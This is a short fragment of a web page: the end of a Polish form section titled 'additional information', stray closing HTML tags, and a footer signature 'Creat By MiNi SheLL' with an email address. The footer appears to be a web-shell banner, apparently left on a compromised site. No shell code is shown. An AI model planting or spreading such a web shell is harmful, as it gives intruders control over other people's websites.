                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com